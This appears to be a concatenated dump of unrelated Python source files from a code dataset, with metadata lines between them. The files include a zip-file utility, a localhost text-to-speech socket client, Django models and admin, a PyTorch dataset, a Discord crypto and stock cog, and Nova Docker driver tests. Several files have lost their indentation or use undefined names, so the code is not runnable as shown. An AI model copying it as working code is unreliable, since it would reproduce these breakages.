else:
raise e
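
if __name__ == "__main__":
    # Usage sketch against a placeholder endpoint (api.example.com is not a real
    # service); it shows how the session, bearer token and retry helper fit together.
    client = ServiceClient("https://api.example.com", token="dummy-token")
    try:
        status = client._make_request(
            client.session.get,
            retries=2,
            url=client.make_full_url("/status"),
        )
        print(status)
    except Exception as exc:
        print("request failed (expected for the placeholder URL):", exc)
    finally:
        client._dispose()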
| 2.921875 | 3 |
flametree/utils.py | Edinburgh-Genome-Foundry/Flametree | 165 | 5056 | <gh_stars>100-1000
import os
import shutil
from .ZipFileManager import ZipFileManager
from .DiskFileManager import DiskFileManager
from .Directory import Directory
import string
printable = set(string.printable) - set("\x0b\x0c")
def is_hex(s):
return any(c not in printable for c in s)
def file_tree(target, replace=False):
"""Open a connection to a file tree which can be either a disk folder, a
zip archive, or an in-memory zip archive.
Parameters
----------
target
Either the path to a target folder, or a zip file, or '@memory' to write
a zip file in memory (at which case a string of the zip file is returned)
If the target is already a flametree directory, it is returned as-is.
replace
If True, will remove the target if it already exists. If False, new files
will be written inside the target and some files may be overwritten.
"""
if isinstance(target, Directory):
return target
if (not isinstance(target, str)) or is_hex(target):
return Directory(file_manager=ZipFileManager(source=target))
elif target == "@memory":
return Directory("@memory", file_manager=ZipFileManager("@memory"))
elif target.lower().endswith(".zip"):
return Directory(target, file_manager=ZipFileManager(target, replace=replace))
else:
return Directory(target, file_manager=DiskFileManager(target))
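
if __name__ == "__main__":
    # Usage sketch: write one file into an in-memory zip. The ``_file``/``_close``
    # methods are assumed from this package's Directory class, as in the project
    # README.
    root = file_tree("@memory")
    root._file("hello.txt").write("Hello, flametree!")
    zip_bytes = root._close()
    print(len(zip_bytes), "bytes of zip data")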
| 3.390625 | 3 |
audio/audio_client.py | artigianitecnologici/marrtino_apps | 0 | 5057 | <reponame>artigianitecnologici/marrtino_apps
import sys
import socket
import time
ip = '127.0.0.1'
port = 9001
if (len(sys.argv)>1):
ip = sys.argv[1]
if (len(sys.argv)>2):
port = int(sys.argv[2])
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip,port))
sock.send(b'bip\n\r')
data = sock.recv(80)
print(data)
sock.send(b'TTS[it-IT] ciao, come stai?\n\r')
data = sock.recv(80)
print(data)
sock.send(b'TTS[en-US] very well, thank you!\n\r')
data = sock.recv(80)
print(data)
sock.send(b'TTS default language is english!\n\r')
data = sock.recv(80)
print(data)
sock.send(b'bop\n\r')
data = sock.recv(80)
print(data)
time.sleep(1)
sock.close()
| 2.5 | 2 |
qmotor/message/matcher.py | yulinfeng000/qmotor | 0 | 5058 | <filename>qmotor/message/matcher.py
from abc import ABC, abstractmethod
from typing import List
from .common import (
AtCell,
BasicMessage,
GroupMessage,
FriendMessage,
MsgCellType,
MessageType,
PlainCell,
)
from ..utils import is_str_blank, str_contains
class MsgMatcher(ABC):
def msg_chain_from_ctx(self, ctx):
return BasicMessage(ctx.msg).messageChain()
def get_cell_type(self, msg_cell):
return msg_cell.get("type", None)
@abstractmethod
def match(self, ctx) -> bool:
pass
class GroupMsg(MsgMatcher):
def match(self, ctx) -> bool:
return BasicMessage(ctx.msg).type() == MessageType.GroupMessage
class FriendMsg(MsgMatcher):
def match(self, ctx) -> bool:
return BasicMessage(ctx.msg).type() == MessageType.FriendMessage
class TempMsg(MsgMatcher):
def match(self, ctx) -> bool:
return BasicMessage(ctx.msg).type() == MessageType.TempMessage
class AtMsg(GroupMsg):
def match(self, ctx) -> bool:
if not super().match(ctx):
return False
msg_chain = self.msg_chain_from_ctx(ctx)
return self.get_cell_type(msg_chain[1]) == MsgCellType.At
class AtMeMsg(AtMsg):
me_qq: int
def __init__(self, me_qq) -> None:
super(AtMeMsg, self).__init__()
self.me_qq = me_qq
def match(self, ctx) -> bool:
if not super().match(ctx):
return False
msg_chain = GroupMessage(ctx.msg).messageChain()
at = AtCell(msg_chain[1])
return self.me_qq == at.target()
class JustAtMeMsg(AtMeMsg):
def __init__(self, me_qq) -> None:
super(JustAtMeMsg, self).__init__(me_qq)
def match(self, ctx) -> bool:
if not super().match(ctx):
return False
msg_chain = self.msg_chain_from_ctx(ctx)
plain = PlainCell(msg_chain[2])
return is_str_blank(plain.text())
class AtMeCmdMsg(AtMeMsg):
cmd_list: List[str]
def __init__(self, me_qq, cmd) -> None:
super(AtMeCmdMsg, self).__init__(me_qq)
self.cmd_list = cmd
def match(self, ctx) -> bool:
if not super().match(ctx):
return False
msg_chain = self.msg_chain_from_ctx(ctx)
return str_contains(PlainCell(msg_chain[2]).text(), self.cmd_list)
class SpecificFriendMsg(FriendMsg):
friend_qq: int
def __init__(self, friend_qq) -> None:
super(SpecificFriendMsg, self).__init__()
self.friend_qq = friend_qq
def match(self, ctx) -> bool:
if not super().match(ctx):
return False
return self.friend_qq == FriendMessage(ctx.msg).friend_qq()
class SpecificGroupMsg(GroupMsg):
group_qq: int
def __init__(self, group_qq) -> None:
super(SpecificGroupMsg, self).__init__()
self.group_qq = group_qq
def match(self, ctx) -> bool:
if not super().match(ctx):
return False
return self.group_qq == GroupMessage(ctx.msg).group_qq()
if __name__ == "__main__":
msg_matcher = JustAtMeMsg(123)
class Ctx:
def __init__(self, msg) -> None:
self.msg = msg
msg = {
"type": "GroupMessage",
"sender": {"id": 123, "nickname": "", "remark": ""},
"messageChain": [
{"type": "Source", "id": 123456, "time": 123456},
{"type": "At", "target": 1234, "display": "@Mirai"},
{"type": "Plain", "text": " "},
],
}
print(msg_matcher.match(Ctx(msg)))
| 2.421875 | 2 |
invert-binary-tree/invert-binary-tree.py | Atri10/Leet-code---Atri_Patel | 1 | 5059 | class Solution:
def invertTree(self, root: Optional[TreeNode]) -> Optional[TreeNode]:
if root:
root.left,root.right = self.invertTree(root.right),self.invertTree(root.left)
return root
return None | 3.515625 | 4 |
main/admin.py | sinahmr/childf | 0 | 5060 | from django.contrib import admin
from django.contrib.auth.admin import UserAdmin as DjangoUserAdmin
from django.contrib.auth.models import Group
from django.utils.translation import ugettext_lazy as _
from main.models import UserInfo, User, Child, Volunteer, Donor, Letter, Need, PurchaseForInstitute, PurchaseForNeed, \
Activity, OngoingUserInfo
@admin.register(User)
class UserAdmin(DjangoUserAdmin):
class UserInfoInline(admin.TabularInline):
model = UserInfo
extra = 1
max_num = 1
fieldsets = (
(None, {'fields': ('email', 'password')}),
(_('Permissions'), {'fields': ('is_active', 'is_staff', 'is_superuser')}),
(_('Important dates'), {'fields': ('last_login', 'date_joined')}),
)
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('email', '<PASSWORD>', '<PASSWORD>'),
}),
)
list_display = ('email', 'userinfo', 'is_staff')
search_fields = ('email', 'userinfo__first_name', 'userinfo__last_name')
ordering = ('email',)
inlines = [UserInfoInline]
admin.site.unregister(Group)
admin.site.register(Child)
admin.site.register(Volunteer)
admin.site.register(Donor)
admin.site.register(Letter)
admin.site.register(Need)
admin.site.register(PurchaseForInstitute)
admin.site.register(PurchaseForNeed)
admin.site.register(Activity)
admin.site.register(OngoingUserInfo)
| 1.9375 | 2 |
hunting/display/render.py | MoyTW/RL_Arena_Experiment | 0 | 5061 | import tdl
import time
import hunting.constants as c
class Renderer:
def __init__(self, main_console=None, level_display_width=c.SCREEN_WIDTH, level_display_height=c.SCREEN_HEIGHT):
if main_console is None:
self.main_console = tdl.init(level_display_width, level_display_height, 'From Renderer Default Constructor')
else:
self.main_console = main_console
self.level_display_width = level_display_width
self.level_display_height = level_display_height
self._level_console = tdl.Console(level_display_width, level_display_height)
def _render_level(self, con, level):
for x in range(level.width):
for y in range(level.height):
if level[x][y].blocks is not False:
self._level_console.draw_rect(x, y, 1, 1, None, bg=[120, 0, 50])
else:
self._level_console.draw_rect(x, y, 1, 1, None, bg=[30, 255, 30])
# TODO: This is pretty hacky!
i = 1
for o in level._all_objects:
if o.faction == '1': # TODO: Better faction implementation!
color = [255, 0, 0]
else:
color = [0, 0, 255]
self._level_console.draw_char(o.x, o.y, i, color)
i += 1
con.blit(self._level_console)
def render_all(self, level):
self._render_level(self.main_console, level)
tdl.flush()
def clear(self, level):
for o in level._all_objects:
self._level_console.draw_char(o.x, o.y, ' ')
def render_event(self, level, event):
if event[c.EVENT_TYPE] == c.MOVEMENT_EVENT:
# Clear previous location
self._level_console.draw_char(event[c.MOVEMENT_PREV_X], event[c.MOVEMENT_PREV_Y], ' ', bg=[0, 15, 7])
# Retrieve faction and color
o = level.get_object_by_id(event[c.OBJ_ID])
if o.faction == '1': # TODO: Better faction implementation!
color = [255, 0, 0]
else:
color = [0, 0, 255]
self._level_console.draw_char(event[c.OBJ_X], event[c.OBJ_Y], o.faction, fg=color)
elif event[c.EVENT_TYPE] == c.OBJECT_DESTRUCTION_EVENT:
self._level_console.draw_char(event[c.OBJ_X], event[c.OBJ_Y], ' ', bg=[0, 15, 7])
# Render
self.main_console.blit(self._level_console)
tdl.flush()
def visualize(level, show_time=1):
Renderer().render_all(level)
time.sleep(show_time) | 2.484375 | 2 |
ideas/models.py | neosergio/hackatrix-api | 1 | 5062 | <gh_stars>1-10
from django.db import models
class Idea(models.Model):
title = models.CharField(max_length=255, unique=True)
description = models.TextField()
author = models.OneToOneField('events.Registrant',
related_name='author_idea',
on_delete=models.CASCADE,
blank=True,
null=True)
written_by = models.ForeignKey('users.User',
related_name='written_idea',
on_delete=models.CASCADE,
blank=True,
null=True)
event = models.ForeignKey('events.Event',
related_name='event_idea',
on_delete=models.CASCADE,
blank=True,
null=True)
is_valid = models.BooleanField(default=False)
max_number_of_participants = models.PositiveIntegerField(default=7)
created_at = models.DateTimeField(auto_now_add=True)
modified_at = models.DateTimeField(auto_now=True)
is_active = models.BooleanField(default=True)
class Meta():
ordering = ['-created_at', '-id']
def __str__(self):
return self.title
class IdeaTeamMember(models.Model):
idea = models.ForeignKey(Idea, related_name='idea_team_member', on_delete=models.CASCADE)
member = models.OneToOneField('events.Registrant', related_name='member_idea', on_delete=models.CASCADE)
class Meta():
ordering = ['idea']
unique_together = ('idea', 'member')
verbose_name = 'Team Member'
verbose_name_plural = 'Groups'
| 2.09375 | 2 |
section2/out/src/data_prep/SlicesDataset.py | ssheikh85/AIHCND_c3_3d_imaging | 0 | 5063 | <reponame>ssheikh85/AIHCND_c3_3d_imaging
"""
Module for Pytorch dataset representations
"""
import torch
from torch.utils.data import Dataset
class SlicesDataset(Dataset):
"""
This class represents an indexable Torch dataset
which could be consumed by the PyTorch DataLoader class
"""
def __init__(self, data):
self.data = data
self.slices = []
for i, d in enumerate(data):
for j in range(d["image"].shape[0]):
self.slices.append((i, j))
def __getitem__(self, idx):
"""
This method is called by PyTorch DataLoader class to return a sample with id idx
Arguments:
idx {int} -- id of sample
Returns:
Dictionary of 2 Torch Tensors of dimensions [1, W, H]
"""
slc = self.slices[idx]
sample = dict()
sample["id"] = idx
# You could implement caching strategy here if dataset is too large to fit
# in memory entirely
# Also this would be the place to call transforms if data augmentation is used
# TASK: Create two new keys in the "sample" dictionary, named "image" and "seg"
# The values are 3D Torch Tensors with image and label data respectively.
# First dimension is size 1, and last two hold the voxel data from the respective
# slices. Write code that stores the 2D slice data in the last 2 dimensions of the 3D Tensors.
# Your tensor needs to be of shape [1, patch_size, patch_size]
# Don't forget that you need to put a Torch Tensor into your dictionary element's value
# Hint: your 3D data sits in self.data variable, the id of the 3D volume from data array
# and the slice number are in the slc variable.
# Hint2: You can use None notation like so: arr[None, :] to add size-1
# dimension to a Numpy array
# <YOUR CODE GOES HERE>
img = self.data[slc[0]]["image"][slc[1]]
sample['image'] = torch.from_numpy(img[None,:])
seg = self.data[slc[0]]["seg"][slc[1]]
sample['seg'] = torch.from_numpy(seg[None,:])
return sample
def __len__(self):
"""
This method is called by PyTorch DataLoader class to return number of samples in the dataset
Returns:
int
"""
return len(self.slices)
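
if __name__ == "__main__":
    # Smoke test with a synthetic volume; a real pipeline would pass loaded
    # image/label volumes instead of random arrays.
    import numpy as np
    from torch.utils.data import DataLoader

    data = [{"image": np.random.rand(4, 64, 64), "seg": np.random.randint(0, 2, (4, 64, 64))}]
    loader = DataLoader(SlicesDataset(data), batch_size=2, shuffle=True)
    batch = next(iter(loader))
    print(batch["image"].shape, batch["seg"].shape)  # torch.Size([2, 1, 64, 64]) each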
| 3.5 | 4 |
zenslackchat/zendesk_webhooks.py | uktrade/zenslackchat | 2 | 5064 | from zenslackchat.zendesk_base_webhook import BaseWebHook
from zenslackchat.zendesk_email_to_slack import email_from_zendesk
from zenslackchat.zendesk_comments_to_slack import comments_from_zendesk
class CommentsWebHook(BaseWebHook):
"""Handle Zendesk Comment Events.
"""
def handle_event(self, event, slack_client, zendesk_client):
"""Handle the comment trigger event we have been POSTed.
Recover and update the comments with lastest from Zendesk.
"""
comments_from_zendesk(event, slack_client, zendesk_client)
class EmailWebHook(BaseWebHook):
"""Handle Zendesk Email Events.
"""
def handle_event(self, event, slack_client, zendesk_client):
"""Handle an email created issue and create it on slack.
"""
email_from_zendesk(event, slack_client, zendesk_client)
| 2.125 | 2 |
Examples/PagesOperations/MovePage.py | groupdocs-merger-cloud/groupdocs-merger-cloud-python-samples | 0 | 5065 | <reponame>groupdocs-merger-cloud/groupdocs-merger-cloud-python-samples
# Import modules
import groupdocs_merger_cloud
from Common import Common
# This example demonstrates how to move document page to a new position
class MovePage:
@classmethod
def Run(cls):
pagesApi = groupdocs_merger_cloud.PagesApi.from_config(Common.GetConfig())
options = groupdocs_merger_cloud.MoveOptions()
options.file_info = groupdocs_merger_cloud.FileInfo("WordProcessing/four-pages.docx")
options.output_path = "Output/move-pages.docx"
options.page_number = 1
options.new_page_number = 2
result = pagesApi.move(groupdocs_merger_cloud.MoveRequest(options))
print("Output file path = " + result.path) | 2.5 | 2 |
src/models/predict_model.py | joseluistello/Regression-Analysis-Apple-Data | 0 | 5066 | y_pred=ml.predict(x_test)
print(y_pred)
from sklearn.metrics import r2_score
r2_score(y_test,y_pred)
pred_y_df=pd.DataFrame({'Actual Value':y_test,'Predicted Value':y_pred, 'Difference': y_test-y_pred})
pred_y_df[0:20] | 2.796875 | 3 |
src/models/utils_func.py | Soufiane-Fartit/cars-prices | 0 | 5067 | <reponame>Soufiane-Fartit/cars-prices<filename>src/models/utils_func.py
# -*- coding: utf-8 -*-
""" This module offers util functions to be called and used
in other modules
"""
from datetime import datetime
import os
import json
import pickle
import string
import random
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
import seaborn as sns
from sklearn import tree
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
"""GENERATE A RANDOM STRING TO BE USED AS AN ID
Args:
size (int, optional): size of the string. Defaults to 6.
        chars (str, optional): characters to be used to generate the string.
                               Defaults to string.ascii_lowercase+string.digits.
    Returns:
        [str]: a random string of characters
"""
return "".join(random.choice(chars) for _ in range(size))
def save_model(path, model):
"""SAVE MODEL INTO PICKLE FILE
Args:
path (str): path where to save the model
model (binary): the model to be saved
"""
with open(path, "wb") as file:
pickle.dump(model, file)
def update_history(models_hist_path, model_id, model_name, model, params):
"""SAVE METADATA RELATED TO THE TRAINED MODEL INTO THE HISTORY FILE
Args:
models_hist_path (str): path to the history file
model_id (str): unique id of the model
model_name (str): model name = "model_"+model_id+".pkl"
model (binary): binary file of the model
        params (dict): dictionary containing the hyper-parameters
used to fit the model
"""
model_metadata = dict()
model_metadata["trained"] = str(datetime.now())
model_metadata["model_type"] = type(model).__name__
model_metadata["model_id"] = model_id
model_metadata["params"] = params
print(model_metadata)
with open(models_hist_path, "r+") as outfile:
try:
hist = json.load(outfile)
hist[model_name] = model_metadata
outfile.seek(0)
json.dump(hist, outfile, indent=4)
except json.decoder.JSONDecodeError:
json.dump({model_name: model_metadata}, outfile, indent=4)
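# Example call (illustrative paths and values, not taken from this project):
#   update_history("models/history.json", "a3k9q1", "model_a3k9q1.pkl", model,
#                  {"n_estimators": 100, "max_depth": 8})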
def update_history_add_eval(
models_hist_path, model_id=None, model_name=None, metrics=None
):
"""ADD EVALUATION METRICS THE HISTORY FILE FOR THE SPECIFIED MODEL
Args:
models_hist_path (str): path to the history file
model_id (str, optional): the id of the model. Defaults to None.
model_name (str, optional): the name of the model. Defaults to None.
        metrics (dict, optional): a dictionary containing metadata related
to the model evaluation. Defaults to None.
"""
assert (
model_id is not None or model_name is not None
), "At least the model id or name must be given"
assert models_hist_path is not None, "You must specify the path to the history file"
if not model_name:
model_name = "model_" + model_id + ".pkl"
eval_metadata = dict()
eval_metadata["datetime"] = str(datetime.now())
eval_metadata["metrics"] = metrics
with open(models_hist_path, "r+") as outfile:
try:
hist = json.load(outfile)
hist[model_name]["evaluation"] = eval_metadata
outfile.seek(0)
json.dump(hist, outfile, indent=4)
except json.decoder.JSONDecodeError:
print("cannot save evaluation metadata")
def generate_features_importance_plot(model, features, model_id):
"""GENERATES A PLOT DESCRIBING FEATURES IMPORTANCE FOR THE MODEL
TO MAKE THE PREDICTION.
Args:
model (tree-based model): a tree based model (decision tree, random forest ...)
features (pandas dataframe): a table of the features on which we trained the model
model_id (str): the unique id of the model
"""
mean_importances = model.feature_importances_
importances_indices = np.argsort(mean_importances)[::-1]
ordered_columns = [features.columns[i] for i in importances_indices]
importances = pd.DataFrame(
[tree.feature_importances_ for tree in model.estimators_],
columns=features.columns,
)
importances = importances[ordered_columns]
_, ax = plt.subplots(figsize=(12, 8))
sns.boxplot(x="variable", y="value", ax=ax, data=pd.melt(importances))
figure = ax.get_figure()
figure.savefig(
"models/models-training/run_" + model_id + "/features_importance.png"
)
def plot_trees(rf, feature_names, target_names, model_id):
"""GENERATES A PLOT THAT SHOWS THE DECISION MAKING OF THE TREES
Args:
rf (model): a tree based model (random forest ...)
feature_names (list): names of the columns of the training set
target_names (str): name of the target columns
model_id (str): unique id of the model
"""
fn = feature_names
cn = target_names
fig, axes = plt.subplots(nrows=1, ncols=5, figsize=(10, 2), dpi=900)
for index in range(0, 5):
tree.plot_tree(
rf.estimators_[index],
feature_names=fn,
class_names=cn,
filled=True,
ax=axes[index],
)
axes[index].set_title("Estimator: " + str(index), fontsize=11)
fig.savefig("models/models-training/run_" + model_id + "/Trees.png")
def get_id_list(N=6):
print (os.getcwd())
print([x[0] for x in os.walk("../../models/models-training")])
return [x[0][-N:] for x in os.walk("../../models/models-training")][1:] | 2.78125 | 3 |
modules/finance.py | KpaBap/palbot | 0 | 5068 | import asyncio
import discord
from discord.ext import commands
import re
import sqlite3
from urllib.parse import quote as uriquote
import html
CURR = ["AUD", "BRL", "CAD", "CHF", "CLP", "CNY", "CZK", "DKK", "EUR",
"GBP", "HKD", "HUF", "IDR", "ILS", "INR", "JPY", "KRW", "MXN",
"MYR", "NOK", "NZD", "PHP", "PKR", "PLN", "RUB", "SEK", "SGD",
"THB", "TRY", "TWD", "ZAR"]
class Finance(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command()
async def coin(self, ctx, *, line: str):
"""Look up a cryptocurrency such as Bitcoin
Optionally specify a quantity such as `0.6 ETH`
Optionally specify a conversion value such as `2 BTC in ETH` or `ETH in CAD`"""
coin = await self.parse_coinline(line)
if not coin:
await ctx.send(f"Unable to find coin {line}")
return
url = f"https://api.coinmarketcap.com/v1/ticker/{coin['coin']}{coin['currency']}"
async with self.bot.session.get(url) as resp:
data = await resp.json()
data = data[0]
cid = data['symbol'].upper()
name = data['name']
pUSD = data['price_usd']
pC24 = data['percent_change_24h']
pC1 = data['percent_change_1h']
output = ""
if coin.get('cvtto', ''):
cvtval = await self.convert_coin(coin, data)
if not cvtval:
await ctx.send(f"Failed to look up {coin['cvtto']}")
return
if coin['qty'] == 1:
output = "{} {} | Value: {} {} (${} USD) | 1-hour change: {}% | 24-hour change: {}%".format(cid, name, cvtval, coin['cvtto'].upper(), pUSD, pC1, pC24)
else:
usdfinal = float(pUSD) * coin['qty']
output = "{} {} : {} {} (${:.2f} USD)".format(coin['qty'], cid, cvtval, coin['cvtto'].upper(), usdfinal)
else:
if coin['qty'] == 1:
output = "{} {} | Value: ${} | 1-hour change: {}% | 24-hour change: {}%".format(cid, name, pUSD, pC1, pC24)
else:
finalprice = float(pUSD) * coin['qty']
output = "{} {} : ${:.2f}".format(coin['qty'], cid, finalprice)
if output:
await ctx.send(output)
async def convert_coin(self, coin, data):
if coin['currency']:
cvtval = "{:.2f}".format(float(data['price_{}'.format(coin['cvtto'].lower())]) * coin['qty'])
else:
if not coin['cvtto']:
cvtval = ''
if coin['cvtto'] == "bitcoin":
#api gives us BTC by default
cvtval = self.ffstr(float(data['price_btc']) * coin['qty'])
coin['cvtto'] = "BTC"
else:
pUSD = data['price_usd']
url = "https://api.coinmarketcap.com/v1/ticker/{}".format(coin['cvtto'])
async with self.bot.session.get(url) as resp:
tojson = await resp.json()
coin['cvtto'] = tojson[0]['symbol'].upper()
toval = float(tojson[0]['price_usd'])
cvtval = self.ffstr((float(pUSD) * coin['qty']) / toval)
return cvtval
def ffstr(self, number):
return "{:.8f}".format(float(number)).rstrip('0').rstrip('.')
async def parse_coinline(self, line):
coinqty = 1
qtycheck = re.search(r"(^(\d*\.)?\d+)\s?(\w.+)", line)
if qtycheck:
coinqty = float(qtycheck.group(1))
line = qtycheck.group(3).strip()
curr = ""
cvtto = ""
if " in " in line or " to " in line:
if " in " in line:
coin, cvtto = line.split(" in ")
elif " to " in line:
coin, cvtto = line.split(" to ")
coinid = await self.findcoin(coin)
if cvtto.upper() in CURR:
curr = "?convert={}".format(cvtto)
else:
cvtto = await self.findcoin(cvtto)
else:
coin = line
coinid = await self.findcoin(coin)
if not coinid:
return None
return {'coin': coinid,
'qty': coinqty,
'currency': curr,
'cvtto': cvtto}
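    # Illustrative results (assuming the local sqlite table maps "btc"/"eth" to
    # "bitcoin"/"ethereum"):
    #   await self.parse_coinline("2 btc in cad") -> {'coin': 'bitcoin', 'qty': 2.0,
    #                                                 'currency': '?convert=cad', 'cvtto': 'cad'}
    #   await self.parse_coinline("eth")          -> {'coin': 'ethereum', 'qty': 1,
    #                                                 'currency': '', 'cvtto': ''}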
async def findcoin(self, coin):
conn = sqlite3.connect("coins.sqlite3")
cursor = conn.cursor()
result = cursor.execute("SELECT coinid FROM coins WHERE coinid = (?) OR symbol = (?)", (coin, coin)).fetchone()
if not result:
like = "%{}%".format(coin)
result = cursor.execute("SELECT coinid FROM coins WHERE name LIKE (?)", [like]).fetchone()
if result:
return result[0]
@commands.command(hidden=True)
@commands.is_owner()
async def newcoins(self, ctx):
conn = sqlite3.connect("coins.sqlite3")
cursor = conn.cursor()
result = cursor.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='coins';").fetchone()
if not result:
cursor.execute("CREATE TABLE 'coins' ('symbol' TEXT, 'coinid' TEXT UNIQUE ON CONFLICT REPLACE, 'name' TEXT);")
conn.commit()
url = "https://api.coinmarketcap.com/v1/ticker/?limit=0"
async with self.bot.session.get(url) as resp:
data = await resp.json()
for coin in data:
sym = coin['symbol'].lower()
cid = coin['id'].lower()
name = coin['name'].lower()
cursor.execute("insert into coins values (?, ?, ?)", (sym,cid,name))
conn.commit()
conn.close()
@commands.command(aliases=['stonks', 'stocks'])
async def stock (self, ctx, name: str):
"""Look up a stock and show its current price, change, etc"""
symbol = ""
url = f"https://autoc.finance.yahoo.com/autoc?query={uriquote(name)}®ion=1&lang=en&guccounter=1"
async with self.bot.session.get(url) as resp:
data = await resp.json()
symbol = data['ResultSet']['Result'][0]['symbol']
if not symbol:
await ctx.send(f"Unable to find a stonk named `{name}`")
return
url = f"http://query1.finance.yahoo.com/v7/finance/quote?symbols={symbol}"
async with self.bot.session.get(url) as resp:
data = await resp.json()
data = data["quoteResponse"]["result"][0]
downup = "\N{CHART WITH UPWARDS TREND}" if data['regularMarketChange'] > 0 else "\N{CHART WITH DOWNWARDS TREND}"
outstr = "{}{}: {} {} :: Today's change: {:.2f} ({:.2f}%) {}"
longn = ' ({})'.format(data['shortName']) if 'shortName' in data else ''
outstr = outstr.format(data['symbol'], longn, data['regularMarketPrice'], data['currency'],
float(data['regularMarketChange']), float(data['regularMarketChangePercent']),
downup)
if 'postMarketPrice' in data and (data['marketState'] == "CLOSED" or "POST" in data['marketState']):
pdu = "\N{CHART WITH UPWARDS TREND}" if data['postMarketChange'] > 0 else "\N{CHART WITH DOWNWARDS TREND}"
outstr += " :: After Hours: {:.2f} - Change: {:.2f} {}".format(data['postMarketPrice'],
data['postMarketChange'], pdu)
await ctx.send(html.unescape(outstr))
def setup(bot):
bot.add_cog(Finance(bot))
| 2.984375 | 3 |
SG_GetDataForClassifier.py | shubha1593/MovieReviewAnalysis | 7 | 5069 | <reponame>shubha1593/MovieReviewAnalysis<filename>SG_GetDataForClassifier.py<gh_stars>1-10
from SG_GetFeatureMatrix import *
from SG_VectorY import *
featureMatrix = featureMatrixFromReviews()
Y = getYVector()
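# getDataForClassifier() simply exposes the precomputed feature matrix and label
# vector so downstream training scripts can unpack both in a single call.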
def getDataForClassifier() :
return featureMatrix, Y | 1.953125 | 2 |
greenbounty/bounties/migrations/0001_initial.py | Carnales/green-bounty | 1 | 5070 | <gh_stars>1-10
# Generated by Django 3.1.4 on 2021-01-17 19:12
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Organization',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=25, null=True)),
('balance', models.FloatField()),
('total', models.FloatField()),
],
),
migrations.CreateModel(
name='Hunter',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50, null=True)),
('image', models.ImageField(blank=True, null=True, upload_to='')),
('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Bounty',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=25, null=True)),
('image', models.ImageField(blank=True, null=True, upload_to='')),
('price', models.FloatField()),
('city', models.CharField(max_length=25, null=True)),
('hunter', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='bounties.hunter')),
],
),
]
| 1.742188 | 2 |
nova/tests/virt/docker/test_driver.py | osrg/nova | 0 | 5071 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright (c) 2013 dotCloud, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import socket
import mock
from nova import context
from nova import exception
from nova.openstack.common import jsonutils
from nova.openstack.common import units
from nova import test
from nova.tests import utils
import nova.tests.virt.docker.mock_client
from nova.tests.virt.test_virt_drivers import _VirtDriverTestCase
from nova.virt.docker import hostinfo
from nova.virt.docker import network
class DockerDriverTestCase(_VirtDriverTestCase, test.TestCase):
driver_module = 'nova.virt.docker.DockerDriver'
def setUp(self):
super(DockerDriverTestCase, self).setUp()
self.stubs.Set(nova.virt.docker.driver.DockerDriver,
'docker',
nova.tests.virt.docker.mock_client.MockClient())
def fake_setup_network(self, instance, network_info):
return
self.stubs.Set(nova.virt.docker.driver.DockerDriver,
'_setup_network',
fake_setup_network)
def fake_get_registry_port(self):
return 5042
self.stubs.Set(nova.virt.docker.driver.DockerDriver,
'_get_registry_port',
fake_get_registry_port)
# Note: using mock.object.path on class throws
# errors in test_virt_drivers
def fake_teardown_network(container_id):
return
self.stubs.Set(network, 'teardown_network', fake_teardown_network)
self.context = context.RequestContext('fake_user', 'fake_project')
def test_driver_capabilities(self):
self.assertFalse(self.connection.capabilities['has_imagecache'])
self.assertFalse(self.connection.capabilities['supports_recreate'])
#NOTE(bcwaldon): This exists only because _get_running_instance on the
# base class will not let us set a custom disk/container_format.
def _get_running_instance(self, obj=False):
instance_ref = utils.get_test_instance(obj=obj)
network_info = utils.get_test_network_info()
network_info[0]['network']['subnets'][0]['meta']['dhcp_server'] = \
'1.1.1.1'
image_info = utils.get_test_image_info(None, instance_ref)
image_info['disk_format'] = 'raw'
image_info['container_format'] = 'docker'
self.connection.spawn(self.ctxt, jsonutils.to_primitive(instance_ref),
image_info, [], 'herp', network_info=network_info)
return instance_ref, network_info
def test_get_host_stats(self):
self.mox.StubOutWithMock(socket, 'gethostname')
socket.gethostname().AndReturn('foo')
socket.gethostname().AndReturn('bar')
self.mox.ReplayAll()
self.assertEqual('foo',
self.connection.get_host_stats()['host_hostname'])
self.assertEqual('foo',
self.connection.get_host_stats()['host_hostname'])
def test_get_available_resource(self):
memory = {
'total': 4 * units.Mi,
'free': 3 * units.Mi,
'used': 1 * units.Mi
}
disk = {
'total': 50 * units.Gi,
'available': 25 * units.Gi,
'used': 25 * units.Gi
}
# create the mocks
with contextlib.nested(
mock.patch.object(hostinfo, 'get_memory_usage',
return_value=memory),
mock.patch.object(hostinfo, 'get_disk_usage',
return_value=disk)
) as (
get_memory_usage,
get_disk_usage
):
# run the code
stats = self.connection.get_available_resource(nodename='test')
# make our assertions
get_memory_usage.assert_called_once_with()
get_disk_usage.assert_called_once_with()
expected_stats = {
'vcpus': 1,
'vcpus_used': 0,
'memory_mb': 4,
'memory_mb_used': 1,
'local_gb': 50L,
'local_gb_used': 25L,
'disk_available_least': 25L,
'hypervisor_type': 'docker',
'hypervisor_version': 1000,
'hypervisor_hostname': 'test',
'cpu_info': '?',
